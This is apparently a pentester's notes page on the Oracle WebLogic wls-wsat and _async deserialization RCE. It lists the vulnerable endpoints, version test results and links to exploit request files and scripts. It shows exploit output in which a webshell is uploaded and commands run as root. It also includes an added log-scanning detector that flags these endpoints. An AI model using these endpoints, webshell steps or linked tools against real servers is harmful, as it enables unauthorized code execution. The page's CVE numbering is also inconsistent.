# WebLogic - CVE-2019-2729

Oracle WebLogic Server is affected by a **remote code execution** vulnerability in the `wls-wsat.war` and `wls9_async_response.war` packages, caused by unsafe deserialization of Java objects. A remote **unauthenticated** attacker can exploit the issue by sending a crafted serialized Java object in an HTTP request, executing arbitrary Java code in the context of the web server.

Exploiting `wls-wsat.war` returns command output, while `wls9_async_response.war` is blind (no output is returned).

Affected versions: **10.3.6.0.0**, **12.1.3.0.0** and **12.2.1.3.0**

### Vulnerable endpoints

```bash
## wls-wsat.war (cmd response)
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

## wls9_async_response.war (blind)
/_async/AsyncResponseService
```
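From the defender's side, the endpoint list above is the most useful artifact on this page: any request to one of these paths on a WebLogic host is worth a closer look, and a POST (the serialized object travels in the request body) is the event to alert on. The script below is an added example, not part of the original page or of the exploit scripts it links; it parses access-log lines in the common Apache/Nginx "combined" layout (an assumption about the log format) and flags traffic to the listed endpoints, separating the `wls-wsat` paths (command output returned) from the blind `/_async/` service. It also flags JSP files requested under `/_async/`, since that is where the page's webshell example ends up and no legitimate JSP is served there. The log lines are constructed for the demonstration.

```python
import re
from collections import Counter

# Endpoints listed on the page, grouped by the package that serves them.
WSAT_ENDPOINTS = {
    "/wls-wsat/CoordinatorPortType",
    "/wls-wsat/RegistrationPortTypeRPC",
    "/wls-wsat/ParticipantPortType",
    "/wls-wsat/RegistrationRequesterPortType",
    "/wls-wsat/CoordinatorPortType11",
    "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/ParticipantPortType11",
    "/wls-wsat/RegistrationRequesterPortType11",
}
ASYNC_ENDPOINTS = {"/_async/AsyncResponseService"}

# A JSP requested directly under /_async/ is not part of the service; the
# page's webshell example lands there, so it gets its own finding category.
ASYNC_JSP_RE = re.compile(r"^/_async/[^/?]+\.jsp$", re.IGNORECASE)

# Apache/Nginx "combined"-style access log line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    target = entry.pop("target")
    path, _, query = target.partition("?")        # split off the query string
    entry["path"] = path.rstrip("/") or "/"       # normalise a trailing slash
    entry["query"] = query
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return a finding for one parsed entry, or None if it is not of interest."""
    path = entry["path"]
    if path in WSAT_ENDPOINTS:
        package, category = "wls-wsat.war", "deser-endpoint (command output returned)"
    elif path in ASYNC_ENDPOINTS:
        package, category = "wls9_async_response.war", "deser-endpoint (blind)"
    elif ASYNC_JSP_RE.match(path):
        package, category = "wls9_async_response.war", "webshell-like JSP under /_async/"
    else:
        return None
    # A POST carries the request body where the serialized object would sit, so it
    # is rated high; a GET to an endpoint is more likely enumeration. A JSP under
    # /_async/ that takes a "cmd" parameter is rated high regardless of method.
    if entry["method"] == "POST" or (category.startswith("webshell") and "cmd=" in entry["query"]):
        severity = "high"
    else:
        severity = "info"
    return {
        "src": entry["src"], "ts": entry["ts"], "method": entry["method"],
        "path": path, "status": entry["status"], "package": package,
        "category": category, "severity": severity,
    }


def scan(lines):
    """Run every line through the parser and classifier; keep only findings."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding is not None:
            findings.append(finding)
    return findings


def summarize(findings):
    """Count high-severity findings per source address, for triage."""
    return Counter(f["src"] for f in findings if f["severity"] == "high")


# Constructed sample log lines (not captured from a real host).
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2023:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3412
10.0.0.9 - - [12/May/2023:10:01:10 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1837
10.0.0.9 - - [12/May/2023:10:01:12 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0
10.0.0.9 - - [12/May/2023:10:01:15 +0000] "GET /_async/.example.jsp?cmd=id HTTP/1.1" 200 12
10.0.0.7 - - [12/May/2023:10:02:00 +0000] "GET /wls-wsat/ParticipantPortType11 HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    results = scan(SAMPLE_LOG.splitlines())
    for f in results:
        print(f"{f['severity']:<4} {f['src']:<10} {f['method']:<4} {f['path']}  [{f['package']}: {f['category']}]")
    print("high-severity events per source:", dict(summarize(results)))
```

The first sample line (the admin console login page) produces no finding; the remaining four do, and the per-source summary points at the one address that posted to both deserialization endpoints and then fetched a JSP under `/_async/`. The same classifier can be pointed at a real access log by replacing `SAMPLE_LOG` with the file's lines, provided the log uses the combined format assumed by `LOG_RE`.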

### Test data

| Version | Image | Result | Reason |
|---|---|---|---|
| 10.3.6.0 | [Vulhub 10.3.6.0-2017](https://hub.docker.com/layers/vulhub/weblogic/10.3.6.0-2017/images/sha256-275ec19477cfda389dc1c42158033e7e8c650dd4cba9f090ca0ba673902b73c9?context=explore) | Vulnerable | wls-wsat deserialization |
| 12.2.1.3 | [Vulhub 12.2.1.3-2018](https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3-2018/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore) | Not vulnerable | Endpoints missing |
| 12.2.1.3 | [Vulhub 12.2.1.3](https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore) | Not vulnerable | Endpoints missing |
| 12.2.1.3 | [weblogic:12.2.1.3](https://container-registry.oracle.com/ords/f?p=113:4:100763132084359:::4:P4_REPOSITORY,AI_REPOSITORY,AI_REPOSITORY_NAME,P4_REPOSITORY_NAME,P4_EULA_ID,P4_BUSINESS_AREA_ID:5,5,Oracle%20WebLogic%20Server,Oracle%20WebLogic%20Server,1,0&cs=3KTZ9kW4gHaVNXvYp_seg3AmnCL3G7pI4VfyLUNKH2oNI2LPL15b5PgGNbUGWjuU0cZz_Tul__-raSj8DmP2tQQ) | Inconclusive | "*Old format work area header is disabled.*" |

[Request 01](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req01.txt), RCE on version 10.3.6.0:

![Request 01 result](https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FhxJW3FENgBbiNICm8a8E%2Fcve-2019-2725.png?alt=media&token=f68758ac-2894-4e96-9f63-e7a2e0c6ba8e)

[Request 02](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req02.txt), designed for version 10.2.7.1, RCE on 10.3.6.0:

![Request 02 result](https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2F9nj2QgSCwz5VpSMy5s9i%2Fimage.png?alt=media&token=bd505abb-9ba9-4aaf-804c-0c6455d978ba)

[Request 03](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req03.txt), designed for version 10.3.6.0, RCE on 10.3.6.0:

![Request 03 result](https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2F5L5wavLApgF1rDnmT1z0%2Fimage.png?alt=media&token=1f77fdb9-a8ef-42a2-b816-d5605e26b028)

[Request 04](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req04.txt), designed for version 10.3.6.2, RCE on 10.3.6.0:

![Request 04 result](https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FXOwsswYjyPQ2Ob16FQrY%2Fimage.png?alt=media&token=ef4263cd-e836-4204-9eb8-b38fe01e1773)

[Request 05](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req05.txt), designed for version 12.2.1.3, returns the error "Old format work area header is disabled." on version 12.2.1.3. I'm not sure whether this error is caused by my container; more test data is needed.

![Request 05 result](https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FmiJGthQwMb29mhPiCCap%2Fimage.png?alt=media&token=27501680-bbee-429b-b5a3-02524666eaa2)

### Scripts

[`weblogic_get_webshell.py`](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/weblogic_get_webshell/weblogic_get_webshell.py) - runs three payloads against the target at once, by [rootedshell](https://github.com/rootedshell/Weblogic/tree/master).

```bash
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami : 
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root
```

As there are few public exploits using the `/_async/` endpoint, I've modified *rootedshell*'s script to only upload a webshell and allow direct command execution. The script can be found [here](https://github.com/0xPThree/WebLogic/tree/main/cve-2019-2725/weblogic_webshell).

![Modified webshell script output](https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FzVzGzOpPNsJ7lXjPPqe3%2Fimage.png?alt=media&token=fa96aaad-64fc-4c7d-8437-ab8c44bb28d2)
